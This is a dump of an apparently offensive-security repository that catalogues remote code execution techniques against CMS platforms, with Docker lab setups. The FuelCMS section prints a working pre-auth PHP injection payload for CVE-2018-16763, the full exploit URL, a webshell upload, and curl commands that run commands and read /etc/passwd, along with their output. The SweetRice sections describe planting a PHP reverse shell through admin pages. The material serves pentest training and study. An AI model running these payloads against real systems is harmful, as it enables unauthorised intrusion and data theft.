\"%{Referer}i\" \"%{User-Agent}i\"" combined 221 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 222 | LogFormat "%{Referer}i -> %U" referer 223 | LogFormat "%{User-agent}i" agent 224 | 225 | # Include of directories ignores editors' and dpkg's backup files, 226 | # see README.Debian for details. 227 | 228 | # Include generic snippets of statements 229 | IncludeOptional conf-enabled/*.conf 230 | 231 | # Include the virtual host configurations: 232 | IncludeOptional sites-enabled/*.conf 233 | 234 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 235 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/README.md: -------------------------------------------------------------------------------- 1 | # FuelCMS 2 | 3 | FUEL CMS is a CodeIgniter based content management system. 4 | 5 | - https://www.getfuelcms.com/ 6 | 7 | ## Techniques to achieve RCE on FuelCMS 8 | 9 | ### Version specific 10 | 11 | - [CVE-2018-16763 Version <= 1.4.1](techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/README.md) 12 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/README.md: -------------------------------------------------------------------------------- 1 | # FuelCMS - CVE-2018-16763 - Pre-Auth Remote Code Execution 2 | 3 | ## Requirements 4 | 5 | - FuelCMS version <= 1.4.1 6 | - Unauthenticated. 7 | 8 | ## Exploitation 9 | 10 | ### Download the exploit 11 | 12 | You can find the exploit code for this CVE here: [https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE) 13 | 14 | ### Step 1: Upload the webshell plugin 15 | 16 | First, you need to start the interactive [console.py](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE/blob/master/console.py) to execute commands and download remote files. It will use CVE-2018-16763 php code injection in the `filter` parameter to upload a php webshell API in FuelCMS using `file_put_contents`. The payload used is the following: 17 | 18 | ``` 19 | '+pi(print($a='file_put_contents'))+$a($_POST["d0eb3f9a"],$_POST["9bc30f43"])+' 20 | ``` 21 | 22 | This payload urlencoded gives: 23 | 24 | ``` 25 | %27%2Bpi%28print%28%24a%3D%27file%5Fput%5Fcontents%27%29%29%2B%24a%28%24%5FPOST%5B%22d0eb3f9a%22%5D%2C%24%5FPOST%5B%229bc30f43%22%5D%29%2B%27 26 | ``` 27 | 28 | The final exploit URL is: 29 | 30 | ``` 31 | http://127.0.0.1:10080/fuel/pages/select/?filter=%27%2Bpi%28print%28%24a%3D%27file%5Fput%5Fcontents%27%29%29%2B%24a%28%24%5FPOST%5B%22d0eb3f9a%22%5D%2C%24%5FPOST%5B%229bc30f43%22%5D%29%2B%27 32 | ``` 33 | 34 | Now the interactive [console.py](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE/blob/master/console.py) performs a POST request to this URL to upload [./webshell/webshell.php](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE/blob/master/webshell/webshell.php) into Fuel CMS. 35 | 36 | ![](./.github/shell_autoupload.png) 37 | 38 | ### Step 2.1: Executing commands 39 | 40 | You can now execute commands by sending a GET or POST request to http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php with `action=exec&cmd=id`: 41 | 42 | ```sh 43 | $ curl -X POST 'http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php' --data "action=exec&cmd=id" 44 | {"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","exec":"id"} 45 | ``` 46 | 47 | You can also access it by a GET request from a browser. 48 | 49 | ### Step 2.2: Downloading files 50 | 51 | You can also download remote files by sending a GET or POST request to http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php with `action=download&cmd=/etc/passwd`: 52 | 53 | ```sh 54 | $ curl -X POST 'http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php' --data "action=download&path=/etc/passwd" -o- 55 | root:x:0:0:root:/root:/bin/bash 56 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 57 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 58 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 59 | sync:x:4:65534:sync:/bin:/bin/sync 60 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 61 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 62 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 63 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 64 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 65 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 66 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 67 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 68 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 69 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 70 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 71 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 72 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 73 | _apt:x:100:65534::/nonexistent:/usr/sbin/nologin 74 | mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false 75 | ``` 76 | 77 | You can also download a remote file from a browser with a GET request. 78 | 79 | ### Step 3: The interactive console 80 | 81 | When your webshell is active, you can now use the interactive [console.py](https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE/blob/master/console.py) to execute commands and download remote files. 82 | 83 | https://user-images.githubusercontent.com/79218792/171498197-2fb8a7bd-45b0-4fd7-86a1-9bb74aa31664.mp4 84 | 85 | ## References 86 | - https://www.getfuelcms.com/ 87 | - https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE 88 | - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 89 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/imgs/exploit_trigger.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/imgs/exploit_trigger.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "FuelCMS - CVE-2018-16763 - Pre-Auth Remote Code Execution", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://www.getfuelcms.com/", 6 | "https://github.com/p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE", 7 | "https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1" 8 | ] 9 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | ENV VERSION 1.4 4 | 5 | RUN apt-get -y -qq update \ 6 | && apt-get -y -qq install gnupg apt-transport-https lsb-release ca-certificates apache2 git curl unzip wget composer mariadb-client mariadb-server \ 7 | && wget -O /etc/apt/trusted.gpg.d/php.gpg https://packages.sury.org/php/apt.gpg \ 8 | && curl https://packages.sury.org/php/apt.gpg | apt-key add - \ 9 | && echo "deb https://packages.sury.org/php/ $(lsb_release -sc) main" > /etc/apt/sources.list.d/php.list \ 10 | && apt-get -y -qq update; apt-get -y -qq install php5.6 php5.6-mcrypt php5.6-mysql 11 | 12 | # Apache2 configuration + modules 13 | COPY ./files/apache2.conf /etc/apache2/apache2.conf 14 | RUN a2enmod rewrite 15 | 16 | # Installing the CMS 17 | RUN wget "https://codeload.github.com/daylightstudio/FUEL-CMS/tar.gz/refs/tags/${VERSION}" -O /tmp/fuelcms.tar.gz \ 18 | && rm /var/www/html/index.html \ 19 | && cd /tmp/ \ 20 | && tar xvf /tmp/fuelcms.tar.gz \ 21 | && rm -rf /var/www/html/ \ 22 | && mv /tmp/FUEL-CMS-${VERSION}/ /var/www/html 23 | 24 | RUN cd /var/www/html/ \ 25 | && composer install \ 26 | && sed -i "s/\$config\['admin_enabled'\] = FALSE;/\$config\['admin_enabled'\] = TRUE;/g" /var/www/html/fuel/application/config/MY_fuel.php 27 | 28 | # COPY ./files/.htaccess /var/www/html/.htaccess 29 | COPY ./files/database.php /var/www/html/fuel/application/config/database.php 30 | RUN chown www-data: -R /var/www/ 31 | 32 | # Create database fueldb and populate it 33 | RUN service mysql start && \ 34 | mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" && \ 35 | mysql -u root -e "CREATE DATABASE fuelcms; use fuelcms; source /var/www/html/fuel/install/fuel_schema.sql;" 36 | 37 | # Create the entrypoint script 38 | RUN echo "#!/bin/bash" > /entrypoint.sh && \ 39 | echo "service mysql start" >> /entrypoint.sh && \ 40 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh && \ 41 | chmod +x /entrypoint.sh 42 | 43 | RUN find /etc/php -type f -name "php.ini" -exec sed -i 's/^display_errors = Off$/display_errors = On/g' {} \; 44 | 45 | EXPOSE 80 46 | 47 | WORKDIR /var/www/html/ 48 | 49 | CMD /entrypoint.sh 50 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_fuelcms 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: build 11 | docker run --rm -it -p 10080:80 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 10080:80 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/test_env/files/.htaccess: -------------------------------------------------------------------------------- 1 | Options +FollowSymLinks 2 | 3 | 4 | RewriteEngine On 5 | RewriteBase / 6 | 7 | 8 | Order Deny,Allow 9 | Deny From All 10 | 11 | 12 | # Allow asset folders through 13 | RewriteRule ^(fuel/modules/(.+)?/assets/(.+)) - [L] 14 | 15 | # Protect application and system files from being viewed 16 | RewriteRule ^(fuel/install/.+|fuel/crons/.+|fuel/data_backup/.+|fuel/codeigniter/.+|fuel/modules/.+|fuel/application/.+) - [F,L] 17 | 18 | 19 | RewriteCond %{REQUEST_FILENAME} !-f 20 | RewriteCond %{REQUEST_FILENAME} !-d 21 | 22 | RewriteRule .* index.php?/$0 [L] 23 | 24 | # Prevents access to dot files (.git, .htaccess) - security. 25 | RewriteCond %{SCRIPT_FILENAME} -d 26 | RewriteCond %{SCRIPT_FILENAME} -f 27 | RewriteRule "(^|/)\." - [F] 28 | 29 | 30 | Options -Indexes 31 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/test_env/files/apache2.conf: -------------------------------------------------------------------------------- 1 | # This is the main Apache server configuration file. It contains the 2 | # configuration directives that give the server its instructions. 3 | # See http://httpd.apache.org/docs/2.4/ for detailed information about 4 | # the directives and /usr/share/doc/apache2/README.Debian about Debian specific 5 | # hints. 6 | # 7 | # 8 | # Summary of how the Apache 2 configuration works in Debian: 9 | # The Apache 2 web server configuration in Debian is quite different to 10 | # upstream's suggested way to configure the web server. This is because Debian's 11 | # default Apache2 installation attempts to make adding and removing modules, 12 | # virtual hosts, and extra configuration directives as flexible as possible, in 13 | # order to make automating the changes and administering the server as easy as 14 | # possible. 15 | 16 | # It is split into several files forming the configuration hierarchy outlined 17 | # below, all located in the /etc/apache2/ directory: 18 | # 19 | # /etc/apache2/ 20 | # |-- apache2.conf 21 | # | `-- ports.conf 22 | # |-- mods-enabled 23 | # | |-- *.load 24 | # | `-- *.conf 25 | # |-- conf-enabled 26 | # | `-- *.conf 27 | # `-- sites-enabled 28 | # `-- *.conf 29 | # 30 | # 31 | # * apache2.conf is the main configuration file (this file). It puts the pieces 32 | # together by including all remaining configuration files when starting up the 33 | # web server. 34 | # 35 | # * ports.conf is always included from the main configuration file. It is 36 | # supposed to determine listening ports for incoming connections which can be 37 | # customized anytime. 38 | # 39 | # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ 40 | # directories contain particular configuration snippets which manage modules, 41 | # global configuration fragments, or virtual host configurations, 42 | # respectively. 43 | # 44 | # They are activated by symlinking available configuration files from their 45 | # respective *-available/ counterparts. These should be managed by using our 46 | # helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See 47 | # their respective man pages for detailed information. 48 | # 49 | # * The binary is called apache2. Due to the use of environment variables, in 50 | # the default configuration, apache2 needs to be started/stopped with 51 | # /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not 52 | # work with the default configuration. 53 | 54 | 55 | # Global configuration 56 | # 57 | 58 | # 59 | # ServerRoot: The top of the directory tree under which the server's 60 | # configuration, error, and log files are kept. 61 | # 62 | # NOTE! If you intend to place this on an NFS (or otherwise network) 63 | # mounted filesystem then please read the Mutex documentation (available 64 | # at ); 65 | # you will save yourself a lot of trouble. 66 | # 67 | # Do NOT add a slash at the end of the directory path. 68 | # 69 | #ServerRoot "/etc/apache2" 70 | 71 | # 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK. 73 | # 74 | #Mutex file:${APACHE_LOCK_DIR} default 75 | 76 | # 77 | # The directory where shm and other runtime files will be stored. 78 | # 79 | 80 | DefaultRuntimeDir ${APACHE_RUN_DIR} 81 | 82 | # 83 | # PidFile: The file in which the server should record its process 84 | # identification number when it starts. 85 | # This needs to be set in /etc/apache2/envvars 86 | # 87 | PidFile ${APACHE_PID_FILE} 88 | 89 | # 90 | # Timeout: The number of seconds before receives and sends time out. 91 | # 92 | Timeout 300 93 | 94 | # 95 | # KeepAlive: Whether or not to allow persistent connections (more than 96 | # one request per connection). Set to "Off" to deactivate. 97 | # 98 | KeepAlive On 99 | 100 | # 101 | # MaxKeepAliveRequests: The maximum number of requests to allow 102 | # during a persistent connection. Set to 0 to allow an unlimited amount. 103 | # We recommend you leave this number high, for maximum performance. 104 | # 105 | MaxKeepAliveRequests 100 106 | 107 | # 108 | # KeepAliveTimeout: Number of seconds to wait for the next request from the 109 | # same client on the same connection. 110 | # 111 | KeepAliveTimeout 5 112 | 113 | 114 | # These need to be set in /etc/apache2/envvars 115 | User ${APACHE_RUN_USER} 116 | Group ${APACHE_RUN_GROUP} 117 | 118 | # 119 | # HostnameLookups: Log the names of clients or just their IP addresses 120 | # e.g., www.apache.org (on) or 204.62.129.132 (off). 121 | # The default is off because it'd be overall better for the net if people 122 | # had to knowingly turn this feature on, since enabling it means that 123 | # each client request will result in AT LEAST one lookup request to the 124 | # nameserver. 125 | # 126 | HostnameLookups Off 127 | 128 | # ErrorLog: The location of the error log file. 129 | # If you do not specify an ErrorLog directive within a 130 | # container, error messages relating to that virtual host will be 131 | # logged here. If you *do* define an error logfile for a 132 | # container, that host's errors will be logged there and not here. 133 | # 134 | ErrorLog ${APACHE_LOG_DIR}/error.log 135 | 136 | # 137 | # LogLevel: Control the severity of messages logged to the error_log. 138 | # Available values: trace8, ..., trace1, debug, info, notice, warn, 139 | # error, crit, alert, emerg. 140 | # It is also possible to configure the log level for particular modules, e.g. 141 | # "LogLevel info ssl:warn" 142 | # 143 | LogLevel warn 144 | 145 | # Include module configuration: 146 | IncludeOptional mods-enabled/*.load 147 | IncludeOptional mods-enabled/*.conf 148 | 149 | # Include list of ports to listen on 150 | Include ports.conf 151 | 152 | 153 | # Sets the default security model of the Apache2 HTTPD server. It does 154 | # not allow access to the root filesystem outside of /usr/share and /var/www. 155 | # The former is used by web applications packaged in Debian, 156 | # the latter may be used for local directories served by the web server. If 157 | # your system is serving content from a sub-directory in /srv you must allow 158 | # access here, or in any related virtual host. 159 | AccessFileName .htaccess 160 | 161 | 162 | Options FollowSymLinks 163 | AllowOverride None 164 | Require all denied 165 | 166 | 167 | 168 | AllowOverride None 169 | Require all granted 170 | 171 | 172 | 173 | Options Indexes FollowSymLinks 174 | AllowOverride All 175 | Require all granted 176 | 177 | 178 | # 179 | # Options Indexes FollowSymLinks 180 | # AllowOverride None 181 | # Require all granted 182 | # 183 | 184 | 185 | 186 | 187 | # AccessFileName: The name of the file to look for in each directory 188 | # for additional configuration directives. See also the AllowOverride 189 | # directive. 190 | # 191 | AccessFileName .htaccess 192 | 193 | # 194 | # The following lines prevent .htaccess and .htpasswd files from being 195 | # viewed by Web clients. 196 | # 197 | 198 | Require all denied 199 | 200 | 201 | 202 | # 203 | # The following directives define some format nicknames for use with 204 | # a CustomLog directive. 205 | # 206 | # These deviate from the Common Log Format definitions in that they use %O 207 | # (the actual bytes sent including headers) instead of %b (the size of the 208 | # requested file), because the latter makes it impossible to detect partial 209 | # requests. 210 | # 211 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. 212 | # Use mod_remoteip instead. 213 | # 214 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 215 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined 216 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 217 | LogFormat "%{Referer}i -> %U" referer 218 | LogFormat "%{User-agent}i" agent 219 | 220 | # Include of directories ignores editors' and dpkg's backup files, 221 | # see README.Debian for details. 222 | 223 | # Include generic snippets of statements 224 | IncludeOptional conf-enabled/*.conf 225 | 226 | # Include the virtual host configurations: 227 | IncludeOptional sites-enabled/*.conf 228 | 229 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 230 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/FuelCMS/techniques/CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution/test_env/files/database.php: -------------------------------------------------------------------------------- 1 | db->last_query() and profiling of DB queries. 62 | | When you run a query, with this setting set to TRUE (default), 63 | | CodeIgniter will store the SQL statement for debugging purposes. 64 | | However, this may cause high memory usage, especially if you run 65 | | a lot of SQL queries ... disable this to avoid that problem. 66 | | 67 | | The $active_group variable lets you choose which connection group to 68 | | make active. By default there is only one group (the 'default' group). 69 | | 70 | | The $query_builder variables lets you determine whether or not to load 71 | | the query builder class. 72 | */ 73 | $active_group = 'default'; 74 | $query_builder = TRUE; 75 | 76 | $db['default'] = array( 77 | 'dsn' => '', 78 | 'hostname' => 'localhost', 79 | 'username' => 'db', 80 | 'password' => 'db', 81 | 'database' => 'fuelcms', 82 | 'dbdriver' => 'mysqli', 83 | 'dbprefix' => '', 84 | 'pconnect' => FALSE, 85 | 'db_debug' => (ENVIRONMENT !== 'production'), 86 | 'cache_on' => FALSE, 87 | 'cachedir' => '', 88 | 'char_set' => 'utf8', 89 | 'dbcollat' => 'utf8_general_ci', 90 | 'swap_pre' => '', 91 | 'encrypt' => FALSE, 92 | 'compress' => FALSE, 93 | 'stricton' => FALSE, 94 | 'failover' => array(), 95 | 'save_queries' => TRUE 96 | ); 97 | 98 | // used for testing purposes 99 | if (defined('TESTING')) 100 | { 101 | @include(TESTER_PATH.'config/tester_database'.EXT); 102 | } 103 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Joomla/README.md: -------------------------------------------------------------------------------- 1 | # Joomla 2 | 3 | Joomla, also spelled Joomla! and sometimes abbreviated as J!, is a free and open-source content management system for publishing web content on websites. Web content applications include discussion forums, photo galleries, e-Commerce and user communities and numerous other web-based applications. 4 | 5 | - https://www.joomla.org/ 6 | 7 | ## Techniques to achieve RCE on Joomla 8 | 9 | ### With admin credentials 10 | 11 | - [Upload a plugin](./techniques/Upload-a-plugin/README.md) 12 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Joomla/techniques/Upload-a-plugin/README.md: -------------------------------------------------------------------------------- 1 | # Joomla - Upload a plugin 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on Joomla. 6 | 7 | ## Exploitation 8 | 9 | 10 | ## References 11 | - -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Joomla/techniques/Upload-a-plugin/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Joomla - Upload a plugin", 3 | "work_in_progress": false, 4 | "references": [] 5 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Joomla/techniques/Upload-a-plugin/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | RUN apt-get -y -q update; \ 4 | apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server 5 | 6 | RUN service mysql start;\ 7 | mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 8 | 9 | RUN wget 'https://downloads.joomla.org/cms/joomla4/4-1-3/Joomla_4-1-3-Stable-Full_Package.zip?format=zip' -O /tmp/Joomla.zip ;\ 10 | cd /var/www/html/; rm index.html; unzip /tmp/Joomla.zip 11 | 12 | RUN chown www-data: -R /var/www/ 13 | 14 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 15 | echo "service mysql start" >> /entrypoint.sh ;\ 16 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 17 | chmod +x /entrypoint.sh 18 | 19 | EXPOSE 80 20 | 21 | CMD /entrypoint.sh 22 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Joomla/techniques/Upload-a-plugin/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_joomla 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: build 11 | docker run --rm -it -p 8080:8080 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 8080:8080 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/README.md: -------------------------------------------------------------------------------- 1 | # Content-Management-Systems-(CMS) 2 | 3 | ## Softwares 4 | 5 | - [**Drupal**: (3 techniques)](./Drupal/) 6 | - [**FuelCMS**: (1 technique)](./FuelCMS/) 7 | - [**Joomla**: (1 technique)](./Joomla/) 8 | - [**SweetRice**: (2 techniques)](./SweetRice/) 9 | - [**Typo3**: (1 technique)](./Typo3/) 10 | - [**Wordpress**: (3 techniques)](./Wordpress/) 11 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/README.md: -------------------------------------------------------------------------------- 1 | # SweetRice 2 | 3 | SweeRice is a simple website management system ,it is not just free and open source but provides popular functions such as SEO. It is enough for creating common blog or website, of course, You can also install plugins to extend it,this mode can be very flexible in different stages of site's development. 4 | 5 | - https://www.sweetrice.xyz/ 6 | 7 | ## Techniques to achieve RCE on SweetRice 8 | 9 | ### With admin credentials 10 | 11 | - [Modify theme to include php code](./techniques/Modify-theme-to-include-php-code/) 12 | - [Add an shell Ad](./techniques/Add-ADS/) 13 | 14 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/README.md: -------------------------------------------------------------------------------- 1 | # SweetRice - Add an shell ad 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on the SweetRice. 6 | 7 | ## Exploitation 8 | 9 | ### Accessing the dashboard 10 | 11 | Connect with a user with administrative rights on the SweetRice at [http://TARGET/as/](http://TARGET/as). 12 | 13 | ![](./imgs/dashboard.png) 14 | 15 | ### Installing the plugin 16 | 17 | Then go on the "Ads" page. 18 | 19 | ![](./imgs/ads_page.png) 20 | 21 | ### Get you favorite PHP Reverse shell 22 | 23 | Here we using the pentestmonkey's reverse shell (https://github.com/pentestmonkey/php-reverse-shell) 24 | 25 | ![](./imgs/add_ad.png) 26 | 27 | ### Using the ad 28 | 29 | To use the webshell ad, just access this page http://TARGET/inc/ads/shell.php 30 | 31 | ![](./imgs/shell.png) 32 | 33 | ## References 34 | 35 | - https://www.sweetrice.xyz/ 36 | - https://github.com/pentestmonkey/php-reverse-shell -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/imgs/add_ad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/imgs/add_ad.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/imgs/ads_page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/imgs/ads_page.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/imgs/dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/imgs/dashboard.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/imgs/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/imgs/shell.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "SweetRice - Add an shell ad", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://www.sweetrice.xyz/", 6 | "https://github.com/pentestmonkey/php-reverse-shell" 7 | ] 8 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:latest 2 | 3 | RUN apt-get -y -q update ;\ 4 | apt-get -y -q install apache2 xxd git unzip wget php php-zip php-mysql mariadb-client mariadb-server 5 | 6 | RUN service mariadb start ;\ 7 | mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 8 | 9 | RUN rm /var/www/html/index.html; git clone "https://github.com/sweetrice/SweetRice" /var/www/html/ 10 | 11 | RUN chown www-data: -R /var/www/ 12 | 13 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 14 | echo "service mariadb start" >> /entrypoint.sh ;\ 15 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 16 | chmod +x /entrypoint.sh 17 | 18 | WORKDIR /var/www/html/ 19 | 20 | EXPOSE 80 21 | 22 | CMD /entrypoint.sh 23 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Add-ADS/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_sweetrice 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: build 11 | docker run --rm -it -p 10080:80 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 10080:80 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/SweetRice/techniques/Modify-theme-to-include-php-code/README.md: -------------------------------------------------------------------------------- 1 | # SweetRice - Modify theme to include PHP code 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on SweetRice. 6 | 7 | ## Exploitation 8 | 9 | ### Accessing the dashboard 10 | 11 | Connect with a user with administrative rights on SweetRice at [http://TARGET/as/](http://TARGET/as/). 12 | 13 | ![](./imgs/dashboard.png) 14 | 15 | ### Accessing the theme-editor 16 | 17 | Now access the theme-editor in "Theme" at [http://TARGET/as/?type=theme](http://TARGET/as/?type=theme) 18 | 19 | ![](./imgs/theme_editor.png) 20 | 21 | Then edit the theme to add PHP code inside the page: 22 | 23 | ![](./imgs/reverse_shell.png) 24 | 25 | You can find reverse shell PHP payloads here: 